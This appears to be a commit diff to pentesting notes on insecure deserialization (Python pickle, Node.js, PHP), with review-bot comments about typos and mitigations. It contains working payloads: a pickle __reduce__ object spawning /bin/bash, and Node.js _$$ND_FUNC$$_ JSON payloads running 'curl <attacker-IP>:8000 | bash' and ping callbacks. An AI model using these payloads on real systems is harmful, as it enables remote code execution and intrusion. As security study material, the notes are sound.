details on pickle and php serialize

This commit is contained in:
gurkenhabicht 2024-05-07 21:38:46 +02:00
parent 815f0cdae6
commit 6734e25c2d
3 changed files with 52 additions and 5 deletions

View File

@ -1,7 +1,25 @@
# Pickle # Pickle
Serializes a Python object into a byte stream an back.
When sending pickled data through a network do base64 encoding first to prevent
special characters to do something unexpected.
```python
import pickle
import base64
text = "Hello, World!"
pickled = pickle.dumps(text)
send_data = base64.b64encode(pickled)
receive_data = base64.b64decode(send_data)
unpickled = pickle.loads(pickled)
```
## Payload ## Payload
* Inject payload
The following payload can be injected into a pickled object.
```python ```python
import pickle import pickle
import os import os
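Review bot: the round trip in the first snippet never exercises the decoded data: `unpickled = pickle.loads(pickled)` should be `pickle.loads(receive_data)`, otherwise the `base64.b64decode` on the line above is dead code. The sentence introducing the block also overstates what base64 buys: it only makes the binary stream safe to carry inside text protocols, it is not a safety measure, because `pickle.loads()` on attacker-controlled bytes executes whatever `__reduce__` returns (exactly what the Payload section below demonstrates). Suggest saying so plainly ("never unpickle data from an untrusted source; authenticate it with `hmac` first or use a data-only format such as JSON") and fixing the typos `an back` -> `and back` and `prevent special characters to do` -> `from doing`.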
@ -10,12 +28,12 @@ class evil_object(object):
def __reduce__(self): def __reduce__(self):
return(os.system, ('/bin/bash',)) return(os.system, ('/bin/bash',))
x = evil_object() x = evil_object()
x = evil_object()
y = pickle.dumps(x) y = pickle.dumps(x)
base64.b64encode(y) base64.b64encode(y)
``` ```
* Dump serialized object via * Dump serialized object via
```python ```python
pickle.dump(SerializedPickle(), open('pickled.out', 'wb') pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
``` ```
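Review bot: the added line duplicates `x = evil_object()`, which is already present on the line directly above it; drop one of the two. In the same block the result of `base64.b64encode(y)` is discarded, so it should be assigned or printed, and the only imports visible in the snippet are `pickle` and `os`, so check that `import base64` is present. The `Dump serialized object via` line is missing its closing parenthesis (`pickle.dump(SerializedPickle(), open('pickled.out', 'wb'))`), references a `SerializedPickle` class that is not defined anywhere in the file (the class above is `evil_object`), and leaves the file handle open; `with open('pickled.out', 'wb') as f: pickle.dump(x, f)` fixes all three.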

View File

@ -5,10 +5,13 @@
## Example Payloads ## Example Payloads
* Encode, send and wait with `sudo tcpdump -i <interface> icmp` * Encode, send and wait with `sudo tcpdump -i <interface> icmp`
```js ```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"} {"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
``` ```
* reverse shell via
Reverse shell via
```js ```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"} {"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
``` ```
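Review bot: the edit replaces the bullet `* reverse shell via` with the bare line `Reverse shell via`, which breaks the list that the preceding `* Encode, send and wait ...` item belongs to; keep the prefix (`* Reverse shell via`). The section also never says which deserializer consumes this JSON or what the `_$$ND_FUNC$$_` prefix means to it, so a reader cannot tell why a plain string value ends up being executed; a one-line note naming the library and stating that the prefix marks a string the deserializer evaluates as a function body would make both payloads understandable, and `<attacker-IP>` should be called out as a placeholder for the listener address. From a detection standpoint, that literal prefix inside JSON request bodies is a usable signature and deserves a mention.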

View File

@ -1,8 +1,34 @@
# Unserialize # PHP (De-)Serialization
A basic example of (de-)serialization is the following
Serialize is show in the following snippet.
```php
<?php
$plain_text = array("title" => "Hello, World!", "content" => "Lore Ipsum Dolor");
$serialized = serialize($plain_text);
file_put_contents('serialized.txt', $serialized);
?>
```
Deserialize is done in the following snippet.
```php
<?php
$serialized = file_get_contents('serialized.txt');
$plain_text = unserialize($serialized);
echo "Title: " . $plain_text['title'];
echo "Content: " . $plain_text['content'];
?>
```
## Unserialize
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize) * [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
* Serialize via Serialize a form on a website through PHP via
```php ```php
<?php <?php
class FormSubmit { class FormSubmit {
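Review bot: the two intro sentences overlap; `A basic example of (de-)serialization is the following` followed by `Serialize is show in the following snippet.` should be merged into one (and `show` -> `shown`, `Lore Ipsum` -> `Lorem Ipsum`). Under `## Unserialize`, the bullet `* Serialize via` is replaced by the unbulleted `Serialize a form on a website through PHP via`, which leaves `* [Not so secure](...)` as a one-item list; keep the `* ` prefix. More importantly, the section shows `unserialize()` being called on file contents but never states the point the linked URL (remote-code-execution-via-php-unserialize) is about: when `unserialize()` runs on user-controlled input, the sender chooses the class of the object that gets instantiated, so that class's magic methods (`__wakeup`, `__destruct`) run on attacker-chosen property values. Suggest one sentence to that effect plus the mitigation, `unserialize($data, ['allowed_classes' => false])` (PHP 7.0+) or `json_decode()` for data interchange. Minor: the trailing `?>` closing tags in pure-PHP files are unnecessary and can emit stray whitespace.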